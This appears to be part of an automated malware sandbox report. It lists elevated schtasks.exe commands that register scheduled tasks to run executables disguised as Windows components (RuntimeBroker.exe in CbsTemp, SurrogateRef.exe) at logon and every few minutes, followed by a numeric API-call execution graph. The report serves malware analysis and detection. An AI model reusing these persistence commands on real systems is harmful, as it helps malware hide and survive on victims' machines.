              Commandline:schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe'" /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:26
              Start time:09:43:13
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQ" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:27
              Start time:09:43:13
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 9 /tr "'C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:28
              Start time:09:43:14
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SurrogateRefS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows mail\SurrogateRef.exe'" /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:29
              Start time:09:43:14
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SurrogateRef" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\SurrogateRef.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:31
              Start time:09:43:15
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SurrogateRefS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows mail\SurrogateRef.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:33
              Start time:09:43:15
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:35
              Start time:09:43:15
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:36
              Start time:09:43:15
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:38
              Start time:09:43:16
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 14 /tr "'C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exe'" /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:40
              Start time:09:43:16
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQ" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:41
              Start time:09:43:16
              Start date:04/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 10 /tr "'C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f
              Imagebase:0x7ff7bd6e0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:9.7%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:9.5%
                Total number of Nodes:1470
                Total number of Limit Nodes:31
                execution_graph 24819 559b50 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24769 568050 8 API calls ___vcrt_uninitialize 23689 55dc5d 23690 55dc2e 23689->23690 23692 55df59 23690->23692 23720 55dc67 23692->23720 23694 55df73 23695 55dfd0 23694->23695 23708 55dff4 23694->23708 23696 55ded7 DloadReleaseSectionWriteAccess 11 API calls 23695->23696 23697 55dfdb RaiseException 23696->23697 23698 55e1c9 23697->23698 23699 55ec4a DloadUnlock 5 API calls 23698->23699 23701 55e1d8 23699->23701 23700 55e06c LoadLibraryExA 23702 55e0cd 23700->23702 23703 55e07f GetLastError 23700->23703 23701->23690 23706 55e0df 23702->23706 23709 55e0d8 FreeLibrary 23702->23709 23704 55e092 23703->23704 23705 55e0a8 23703->23705 23704->23702 23704->23705 23710 55ded7 DloadReleaseSectionWriteAccess 11 API calls 23705->23710 23707 55e13d GetProcAddress 23706->23707 23716 55e19b 23706->23716 23711 55e14d GetLastError 23707->23711 23707->23716 23708->23700 23708->23702 23708->23706 23708->23716 23709->23706 23712 55e0b3 RaiseException 23710->23712 23713 55e160 23711->23713 23712->23698 23715 55ded7 DloadReleaseSectionWriteAccess 11 API calls 23713->23715 23713->23716 23717 55e181 RaiseException 23715->23717 23731 55ded7 23716->23731 23718 55dc67 ___delayLoadHelper2@8 11 API calls 23717->23718 23719 55e198 23718->23719 23719->23716 23721 55dc73 23720->23721 23722 55dc99 23720->23722 23739 55dd15 23721->23739 23722->23694 23725 55dc94 23749 55dc9a 23725->23749 23728 55df24 23729 55ec4a DloadUnlock 5 API calls 23728->23729 23730 55df55 23729->23730 23730->23694 23732 55dee9 23731->23732 23733 55df0b 23731->23733 23734 55dd15 DloadLock 8 API calls 23732->23734 23733->23698 23735 55deee 23734->23735 23736 55df06 23735->23736 23738 55de67 DloadProtectSection 3 API calls 23735->23738 23758 55df0f 8 API calls DloadUnlock 23736->23758 23738->23736 23740 55dc9a DloadUnlock 3 API calls 23739->23740 23741 55dd2a 23740->23741 23742 55ec4a DloadUnlock 5 API calls 23741->23742 23743 55dc78 23742->23743 23743->23725 23744 55de67 23743->23744 23745 55de7c DloadObtainSection 23744->23745 23746 55deb7 VirtualProtect 23745->23746 23747 55de82 23745->23747 23757 55dd72 VirtualQuery GetSystemInfo 23745->23757 23746->23747 23747->23725 23750 55dca7 23749->23750 23751 55dcab 23749->23751 23750->23728 23752 55dcb3 GetModuleHandleW 23751->23752 23753 55dcaf 23751->23753 23754 55dcc5 23752->23754 23755 55dcc9 GetProcAddress 23752->23755 23753->23728 23754->23728 23755->23754 23756 55dcd9 GetProcAddress 23755->23756 23756->23754 23757->23746 23758->23733 23763 549b59 23764 549bd7 23763->23764 23767 549b63 23763->23767 23765 549bad SetFilePointer 23765->23764 23766 549bcd GetLastError 23765->23766 23766->23764 23767->23765 24821 55be49 98 API calls 3 library calls 24771 55ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24772 558c40 GetClientRect 24773 563040 5 API calls 2 library calls 24774 570040 IsProcessorFeaturePresent 24822 55d34e DialogBoxParamW 24775 541075 82 API calls pre_c_initialization 24776 555c77 121 API calls __vswprintf_c_l 23779 55d573 23780 55d580 23779->23780 23781 54ddd1 53 API calls 23780->23781 23782 55d594 23781->23782 23783 54400a _swprintf 51 API calls 23782->23783 23784 55d5a6 SetDlgItemTextW 23783->23784 23787 55ac74 PeekMessageW 23784->23787 23788 55ac8f GetMessageW 23787->23788 23789 55acc8 23787->23789 23790 55aca5 IsDialogMessageW 23788->23790 23791 55acb4 TranslateMessage DispatchMessageW 23788->23791 23790->23789 23790->23791 23791->23789 24780 55fc60 51 API calls 2 library calls 24782 563460 RtlUnwind 24783 569c60 71 API calls _free 24784 569e60 31 API calls 2 library calls 24824 546110 80 API calls 24825 56b710 GetProcessHeap 24826 56a918 27 API calls 3 library calls 24827 55be49 108 API calls 4 library calls 24828 541f05 126 API calls __EH_prolog 24787 55ea00 46 API calls 6 library calls 24654 55c40e 24655 55c4c7 24654->24655 24662 55c42c _wcschr 24654->24662 24656 55c4e5 24655->24656 24672 55be49 _wcsrchr 24655->24672 24689 55ce22 24655->24689 24659 55ce22 18 API calls 24656->24659 24656->24672 24657 55aa36 ExpandEnvironmentStringsW 24657->24672 24659->24672 24660 55ca8d 24662->24655 24663 5517ac CompareStringW 24662->24663 24663->24662 24664 55c11d SetWindowTextW 24664->24672 24667 5635de 22 API calls 24667->24672 24669 55bf0b SetFileAttributesW 24671 55bfc5 GetFileAttributesW 24669->24671 24682 55bf25 ___scrt_fastfail 24669->24682 24671->24672 24674 55bfd7 DeleteFileW 24671->24674 24672->24657 24672->24660 24672->24664 24672->24667 24672->24669 24675 55c2e7 GetDlgItem SetWindowTextW SendMessageW 24672->24675 24678 55c327 SendMessageW 24672->24678 24683 5517ac CompareStringW 24672->24683 24684 559da4 GetCurrentDirectoryW 24672->24684 24686 54a52a 7 API calls 24672->24686 24687 54a4b3 FindClose 24672->24687 24688 55ab9a 76 API calls ___std_exception_copy 24672->24688 24674->24672 24676 55bfe8 24674->24676 24675->24672 24677 54400a _swprintf 51 API calls 24676->24677 24679 55c008 GetFileAttributesW 24677->24679 24678->24672 24679->24676 24680 55c01d MoveFileW 24679->24680 24680->24672 24681 55c035 MoveFileExW 24680->24681 24681->24672 24682->24671 24682->24672 24685 54b4f7 52 API calls 2 library calls 24682->24685 24683->24672 24684->24672 24685->24682 24686->24672 24687->24672 24688->24672 24691 55ce2c ___scrt_fastfail 24689->24691 24690 55d08a 24690->24656 24691->24690 24692 55cf1b 24691->24692 24712 5517ac CompareStringW 24691->24712 24694 54a180 4 API calls 24692->24694 24695 55cf30 24694->24695 24696 55cf4f ShellExecuteExW 24695->24696 24713 54b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24695->24713 24696->24690 24701 55cf62 24696->24701 24698 55cf47 24698->24696 24699 55cf9b 24714 55d2e6 6 API calls 24699->24714 24700 55cff1 CloseHandle 24702 55cfff 24700->24702 24703 55d00a 24700->24703 24701->24699 24701->24700 24704 55cf91 ShowWindow 24701->24704 24715 5517ac CompareStringW 24702->24715 24703->24690 24707 55d081 ShowWindow 24703->24707 24704->24699 24707->24690 24708 55cfb3 24708->24700 24709 55cfc6 GetExitCodeProcess 24708->24709 24709->24700 24710 55cfd9 24709->24710 24710->24700 24712->24692 24713->24698 24714->24708 24715->24703 24788 55ec0b 28 API calls 2 library calls 24830 55db0b 19 API calls ___delayLoadHelper2@8 24831 55be49 103 API calls 4 library calls 24789 55a430 73 API calls 24790 541025 29 API calls pre_c_initialization 24755 549f2f 24756 549f44 24755->24756 24757 549f3d 24755->24757 24758 549f4a GetStdHandle 24756->24758 24765 549f55 24756->24765 24758->24765 24759 549fa9 WriteFile 24759->24765 24760 549f7c WriteFile 24761 549f7a 24760->24761 24760->24765 24761->24760 24761->24765 24763 54a031 24767 547061 75 API calls 24763->24767 24765->24757 24765->24759 24765->24760 24765->24761 24765->24763 24766 546e18 60 API calls 24765->24766 24766->24765 24767->24757 22882 5410d5 22887 545bd7 22882->22887 22888 545be1 __EH_prolog 22887->22888 22894 54b07d 22888->22894 22890 545bed 22900 545dcc GetCurrentProcess GetProcessAffinityMask 22890->22900 22895 54b087 __EH_prolog 22894->22895 22901 54ea80 80 API calls 22895->22901 22897 54b099 22902 54b195 22897->22902 22901->22897 22903 54b1a7 ___scrt_fastfail 22902->22903 22906 550948 22903->22906 22909 550908 GetCurrentProcess GetProcessAffinityMask 22906->22909 22910 54b10f 22909->22910 22910->22890 24791 55acd0 100 API calls 24839 5519d0 26 API calls std::bad_exception::bad_exception 22913 55ead2 22914 55eade ___FrameUnwindToState 22913->22914 22939 55e5c7 22914->22939 22916 55eae5 22918 55eb0e 22916->22918 23019 55ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 22916->23019 22926 55eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22918->22926 22950 56824d 22918->22950 22922 55eb2d ___FrameUnwindToState 22923 55ebad 22958 55f020 22923->22958 22926->22923 23020 567243 38 API calls 3 library calls 22926->23020 22934 55ebd9 22936 55ebe2 22934->22936 23021 56764a 28 API calls _abort 22934->23021 23022 55e73e 13 API calls 2 library calls 22936->23022 22940 55e5d0 22939->22940 23023 55ed5b IsProcessorFeaturePresent 22940->23023 22942 55e5dc 23024 562016 22942->23024 22944 55e5e1 22945 55e5e5 22944->22945 23033 5680d7 22944->23033 22945->22916 22948 55e5fc 22948->22916 22951 568264 22950->22951 22952 55ec4a DloadUnlock 5 API calls 22951->22952 22953 55eb27 22952->22953 22953->22922 22954 5681f1 22953->22954 22955 568220 22954->22955 22956 55ec4a DloadUnlock 5 API calls 22955->22956 22957 568249 22956->22957 22957->22926 23091 55f350 22958->23091 22960 55f033 GetStartupInfoW 22961 55ebb3 22960->22961 22962 56819e 22961->22962 23093 56b290 22962->23093 22964 5681a7 22966 55ebbc 22964->22966 23097 56b59a 38 API calls 22964->23097 22967 55d5d4 22966->22967 23284 5500cf 22967->23284 22971 55d5f3 23333 55a335 22971->23333 22973 55d5fc 23337 5513b3 GetCPInfo 22973->23337 22975 55d606 ___scrt_fastfail 22976 55d619 GetCommandLineW 22975->22976 22977 55d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 22976->22977 22978 55d628 22976->22978 23351 54400a 22977->23351 23340 55bc84 22978->23340 22984 55d636 OpenFileMappingW 22988 55d696 CloseHandle 22984->22988 22989 55d64f MapViewOfFile 22984->22989 22985 55d6a0 23345 55d287 22985->23345 22988->22977 22991 55d660 __vswprintf_c_l 22989->22991 22992 55d68d UnmapViewOfFile 22989->22992 22996 55d287 2 API calls 22991->22996 22992->22988 22998 55d67c 22996->22998 22997 558835 8 API calls 22999 55d76a DialogBoxParamW 22997->22999 22998->22992 23000 55d7a4 22999->23000 23001 55d7b6 Sleep 23000->23001 23002 55d7bd 23000->23002 23001->23002 23004 55d7cb 23002->23004 23384 55a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 23002->23384 23005 55d7ea DeleteObject 23004->23005 23006 55d806 23005->23006 23007 55d7ff DeleteObject 23005->23007 23008 55d837 23006->23008 23009 55d849 23006->23009 23007->23006 23385 55d2e6 6 API calls 23008->23385 23381 55a39d 23009->23381 23011 55d83d CloseHandle 23011->23009 23013 55d883 23014 56757e GetModuleHandleW 23013->23014 23015 55ebcf 23014->23015 23015->22934 23016 5676a7 23015->23016 23638 567424 23016->23638 23019->22916 23020->22923 23021->22936 23022->22922 23023->22942 23025 56201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23024->23025 23037 56310e 23025->23037 23029 562031 23030 56203c 23029->23030 23051 56314a DeleteCriticalSection 23029->23051 23030->22944 23032 562029 23032->22944 23079 56b73a 23033->23079 23036 56203f 8 API calls 3 library calls 23036->22945 23038 563117 23037->23038 23040 563140 23038->23040 23042 562025 23038->23042 23052 563385 23038->23052 23057 56314a DeleteCriticalSection 23040->23057 23042->23032 23043 56215c 23042->23043 23072 56329a 23043->23072 23045 562166 23050 562171 23045->23050 23077 563348 6 API calls try_get_function 23045->23077 23047 56217f 23048 56218c 23047->23048 23078 56218f 6 API calls ___vcrt_FlsFree 23047->23078 23048->23029 23050->23029 23051->23032 23058 563179 23052->23058 23055 5633bc InitializeCriticalSectionAndSpinCount 23056 5633a8 23055->23056 23056->23038 23057->23042 23059 5631ad 23058->23059 23061 5631a9 23058->23061 23059->23055 23059->23056 23061->23059 23063 5631cd 23061->23063 23065 563219 23061->23065 23062 5631d9 GetProcAddress 23064 5631e9 __crt_fast_encode_pointer 23062->23064 23063->23059 23063->23062 23064->23059 23066 563241 LoadLibraryExW 23065->23066 23067 563236 23065->23067 23068 563275 23066->23068 23069 56325d GetLastError 23066->23069 23067->23061 23068->23067 23070 56328c FreeLibrary 23068->23070 23069->23068 23071 563268 LoadLibraryExW 23069->23071 23070->23067 23071->23068 23073 563179 try_get_function 5 API calls 23072->23073 23074 5632b4 23073->23074 23075 5632cc TlsAlloc 23074->23075 23076 5632bd 23074->23076 23076->23045 23077->23047 23078->23050 23080 56b753 23079->23080 23083 55ec4a 23080->23083 23082 55e5ee 23082->22948 23082->23036 23084 55ec55 IsProcessorFeaturePresent 23083->23084 23085 55ec53 23083->23085 23087 55f267 23084->23087 23085->23082 23090 55f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23087->23090 23089 55f34a 23089->23082 23090->23089 23092 55f367 23091->23092 23092->22960 23092->23092 23094 56b299 23093->23094 23096 56b2a2 23093->23096 23098 56b188 23094->23098 23096->22964 23097->22964 23118 568fa5 GetLastError 23098->23118 23100 56b195 23139 56b2ae 23100->23139 23102 56b19d 23148 56af1b 23102->23148 23105 56b1b4 23105->23096 23111 56b1f2 23172 56895a 20 API calls _abort 23111->23172 23113 56b20f 23114 56b23b 23113->23114 23115 5684de _free 20 API calls 23113->23115 23117 56b1f7 23114->23117 23179 56adf1 26 API calls 23114->23179 23115->23114 23173 5684de 23117->23173 23119 568fc7 23118->23119 23120 568fbb 23118->23120 23181 5685a9 20 API calls 3 library calls 23119->23181 23180 56a61b 11 API calls 2 library calls 23120->23180 23123 568fc1 23123->23119 23125 569010 SetLastError 23123->23125 23124 568fd3 23126 568fdb 23124->23126 23182 56a671 11 API calls 2 library calls 23124->23182 23125->23100 23129 5684de _free 20 API calls 23126->23129 23128 568ff0 23128->23126 23130 568ff7 23128->23130 23131 568fe1 23129->23131 23183 568e16 20 API calls ___FrameUnwindToState 23130->23183 23132 56901c SetLastError 23131->23132 23184 568566 38 API calls _abort 23132->23184 23134 569002 23136 5684de _free 20 API calls 23134->23136 23138 569009 23136->23138 23138->23125 23138->23132 23140 56b2ba ___FrameUnwindToState 23139->23140 23141 568fa5 ___FrameUnwindToState 38 API calls 23140->23141 23146 56b2c4 23141->23146 23143 56b348 ___FrameUnwindToState 23143->23102 23146->23143 23147 5684de _free 20 API calls 23146->23147 23185 568566 38 API calls _abort 23146->23185 23186 56a3f1 EnterCriticalSection 23146->23186 23187 56b33f LeaveCriticalSection _abort 23146->23187 23147->23146 23188 563dd6 23148->23188 23151 56af4e 23153 56af65 23151->23153 23154 56af53 GetACP 23151->23154 23152 56af3c GetOEMCP 23152->23153 23153->23105 23155 568518 23153->23155 23154->23153 23156 568556 23155->23156 23160 568526 ___FrameUnwindToState 23155->23160 23199 56895a 20 API calls _abort 23156->23199 23158 568541 RtlAllocateHeap 23159 568554 23158->23159 23158->23160 23159->23117 23162 56b350 23159->23162 23160->23156 23160->23158 23198 5671ad 7 API calls 2 library calls 23160->23198 23163 56af1b 40 API calls 23162->23163 23164 56b36f 23163->23164 23167 56b3c0 IsValidCodePage 23164->23167 23169 56b376 23164->23169 23171 56b3e5 ___scrt_fastfail 23164->23171 23165 55ec4a DloadUnlock 5 API calls 23166 56b1ea 23165->23166 23166->23111 23166->23113 23168 56b3d2 GetCPInfo 23167->23168 23167->23169 23168->23169 23168->23171 23169->23165 23200 56aff4 GetCPInfo 23171->23200 23172->23117 23174 5684e9 RtlFreeHeap 23173->23174 23178 568512 __dosmaperr 23173->23178 23175 5684fe 23174->23175 23174->23178 23283 56895a 20 API calls _abort 23175->23283 23177 568504 GetLastError 23177->23178 23178->23105 23179->23117 23180->23123 23181->23124 23182->23128 23183->23134 23186->23146 23187->23146 23189 563df3 23188->23189 23190 563de9 23188->23190 23189->23190 23191 568fa5 ___FrameUnwindToState 38 API calls 23189->23191 23190->23151 23190->23152 23192 563e14 23191->23192 23196 5690fa 38 API calls __fassign 23192->23196 23194 563e2d 23197 569127 38 API calls __fassign 23194->23197 23196->23194 23197->23190 23198->23160 23199->23159 23206 56b02e 23200->23206 23209 56b0d8 23200->23209 23203 55ec4a DloadUnlock 5 API calls 23205 56b184 23203->23205 23205->23169 23210 56c099 23206->23210 23208 56a275 __vswprintf_c_l 43 API calls 23208->23209 23209->23203 23211 563dd6 __fassign 38 API calls 23210->23211 23212 56c0b9 MultiByteToWideChar 23211->23212 23214 56c0f7 23212->23214 23221 56c18f 23212->23221 23216 568518 __vswprintf_c_l 21 API calls 23214->23216 23222 56c118 __vsnwprintf_l ___scrt_fastfail 23214->23222 23215 55ec4a DloadUnlock 5 API calls 23217 56b08f 23215->23217 23216->23222 23224 56a275 23217->23224 23218 56c189 23229 56a2c0 20 API calls _free 23218->23229 23220 56c15d MultiByteToWideChar 23220->23218 23223 56c179 GetStringTypeW 23220->23223 23221->23215 23222->23218 23222->23220 23223->23218 23225 563dd6 __fassign 38 API calls 23224->23225 23226 56a288 23225->23226 23230 56a058 23226->23230 23229->23221 23231 56a073 __vswprintf_c_l 23230->23231 23232 56a099 MultiByteToWideChar 23231->23232 23233 56a0c3 23232->23233 23234 56a24d 23232->23234 23239 568518 __vswprintf_c_l 21 API calls 23233->23239 23241 56a0e4 __vsnwprintf_l 23233->23241 23235 55ec4a DloadUnlock 5 API calls 23234->23235 23236 56a260 23235->23236 23236->23208 23237 56a199 23266 56a2c0 20 API calls _free 23237->23266 23238 56a12d MultiByteToWideChar 23238->23237 23240 56a146 23238->23240 23239->23241 23257 56a72c 23240->23257 23241->23237 23241->23238 23245 56a170 23245->23237 23248 56a72c __vswprintf_c_l 11 API calls 23245->23248 23246 56a1a8 23247 568518 __vswprintf_c_l 21 API calls 23246->23247 23250 56a1c9 __vsnwprintf_l 23246->23250 23247->23250 23248->23237 23249 56a23e 23265 56a2c0 20 API calls _free 23249->23265 23250->23249 23251 56a72c __vswprintf_c_l 11 API calls 23250->23251 23253 56a21d 23251->23253 23253->23249 23254 56a22c WideCharToMultiByte 23253->23254 23254->23249 23255 56a26c 23254->23255 23267 56a2c0 20 API calls _free 23255->23267 23268 56a458 23257->23268 23261 56a79c LCMapStringW 23262 56a75c 23261->23262 23263 55ec4a DloadUnlock 5 API calls 23262->23263 23264 56a15d 23263->23264 23264->23237 23264->23245 23264->23246 23265->23237 23266->23234 23267->23237 23269 56a488 23268->23269 23273 56a484 23268->23273 23269->23262 23275 56a7b4 10 API calls 3 library calls 23269->23275 23270 56a4a8 23270->23269 23272 56a4b4 GetProcAddress 23270->23272 23274 56a4c4 __crt_fast_encode_pointer 23272->23274 23273->23269 23273->23270 23276 56a4f4 23273->23276 23274->23269 23275->23261 23277 56a515 LoadLibraryExW 23276->23277 23278 56a50a 23276->23278 23279 56a532 GetLastError 23277->23279 23280 56a54a 23277->23280 23278->23273 23279->23280 23281 56a53d LoadLibraryExW 23279->23281 23280->23278 23282 56a561 FreeLibrary 23280->23282 23281->23280 23282->23278 23283->23177 23386 55e360 23284->23386 23287 550154 23289 550484 GetModuleFileNameW 23287->23289 23397 5670dd 42 API calls __vsnwprintf_l 23287->23397 23288 5500f0 GetProcAddress 23290 550121 GetProcAddress 23288->23290 23291 550109 23288->23291 23301 5504a3 23289->23301 23290->23287 23297 550133 23290->23297 23291->23290 23293 5503be 23293->23289 23294 5503c9 GetModuleFileNameW CreateFileW 23293->23294 23295 5503fc SetFilePointer 23294->23295 23296 550478 CloseHandle 23294->23296 23295->23296 23298 55040c ReadFile 23295->23298 23296->23289 23297->23287 23298->23296 23302 55042b 23298->23302 23303 5504d2 CompareStringW 23301->23303 23305 550508 GetFileAttributesW 23301->23305 23306 550520 23301->23306 23388 54acf5 23301->23388 23391 550085 23301->23391 23302->23296 23304 550085 2 API calls 23302->23304 23303->23301 23304->23302 23305->23301 23305->23306 23307 55052a 23306->23307 23309 550560 23306->23309 23310 550542 GetFileAttributesW 23307->23310 23312 55055a 23307->23312 23308 55066f 23332 559da4 GetCurrentDirectoryW 23308->23332 23309->23308 23311 54acf5 GetVersionExW 23309->23311 23310->23307 23310->23312 23313 55057a 23311->23313 23312->23309 23314 5505e7 23313->23314 23315 550581 23313->23315 23316 54400a _swprintf 51 API calls 23314->23316 23317 550085 2 API calls 23315->23317 23318 55060f AllocConsole 23316->23318 23319 55058b 23317->23319 23320 550667 ExitProcess 23318->23320 23321 55061c GetCurrentProcessId AttachConsole 23318->23321 23322 550085 2 API calls 23319->23322 23401 5635b3 23321->23401 23324 550595 23322->23324 23398 54ddd1 23324->23398 23325 55063d GetStdHandle WriteConsoleW Sleep FreeConsole 23325->23320 23328 54400a _swprintf 51 API calls 23329 5505c3 23328->23329 23330 54ddd1 53 API calls 23329->23330 23331 5505d2 23330->23331 23331->23320 23332->22971 23334 550085 2 API calls 23333->23334 23335 55a349 OleInitialize 23334->23335 23336 55a36c GdiplusStartup SHGetMalloc 23335->23336 23336->22973 23338 5513d7 IsDBCSLeadByte 23337->23338 23338->23338 23339 5513ef 23338->23339 23339->22975 23344 55bc8e 23340->23344 23341 55bda4 23341->22984 23341->22985 23342 55179d CharUpperW 23342->23344 23344->23341 23344->23342 23426 54ecad 80 API calls ___scrt_fastfail 23344->23426 23346 55e360 23345->23346 23347 55d294 SetEnvironmentVariableW 23346->23347 23348 55d2b7 23347->23348 23349 55d2df 23348->23349 23350 55d2d3 SetEnvironmentVariableW 23348->23350 23349->22977 23350->23349 23427 543fdd 23351->23427 23354 55aded LoadBitmapW 23355 55ae15 23354->23355 23356 55ae0e 23354->23356 23358 55ae1b GetObjectW 23355->23358 23359 55ae2a 23355->23359 23461 559e1c FindResourceW 23356->23461 23358->23359 23456 559d1a 23359->23456 23362 55ae80 23373 54d31c 23362->23373 23363 55ae5c 23477 559d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23363->23477 23364 559e1c 13 API calls 23367 55ae4d 23364->23367 23366 55ae64 23478 559d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23366->23478 23367->23363 23369 55ae53 DeleteObject 23367->23369 23369->23363 23370 55ae6d 23479 559f5d 8 API calls ___scrt_fastfail 23370->23479 23372 55ae74 DeleteObject 23372->23362 23490 54d341 23373->23490 23375 54d328 23530 54da4e GetModuleHandleW FindResourceW 23375->23530 23378 558835 23629 55e24a 23378->23629 23382 55a3cc GdiplusShutdown CoUninitialize 23381->23382 23382->23013 23384->23004 23385->23011 23387 5500d9 GetModuleHandleW 23386->23387 23387->23287 23387->23288 23389 54ad09 GetVersionExW 23388->23389 23390 54ad45 23388->23390 23389->23390 23390->23301 23392 55e360 23391->23392 23393 550092 GetSystemDirectoryW 23392->23393 23394 5500c8 23393->23394 23395 5500aa 23393->23395 23394->23301 23396 5500bb LoadLibraryW 23395->23396 23396->23394 23397->23293 23403 54ddff 23398->23403 23402 5635bb 23401->23402 23402->23325 23402->23402 23409 54d28a 23403->23409 23406 54de22 LoadStringW 23407 54ddfc 23406->23407 23408 54de39 LoadStringW 23406->23408 23407->23328 23408->23407 23414 54d1c3 23409->23414 23411 54d2a7 23412 54d2bc 23411->23412 23422 54d2c8 26 API calls 23411->23422 23412->23406 23412->23407 23415 54d1de 23414->23415 23421 54d1d7 _strncpy 23414->23421 23417 54d202 23415->23417 23423 551596 WideCharToMultiByte 23415->23423 23420 54d233 23417->23420 23424 54dd6b 50 API calls __vsnprintf 23417->23424 23425 5658d9 26 API calls 3 library calls 23420->23425 23421->23411 23422->23412 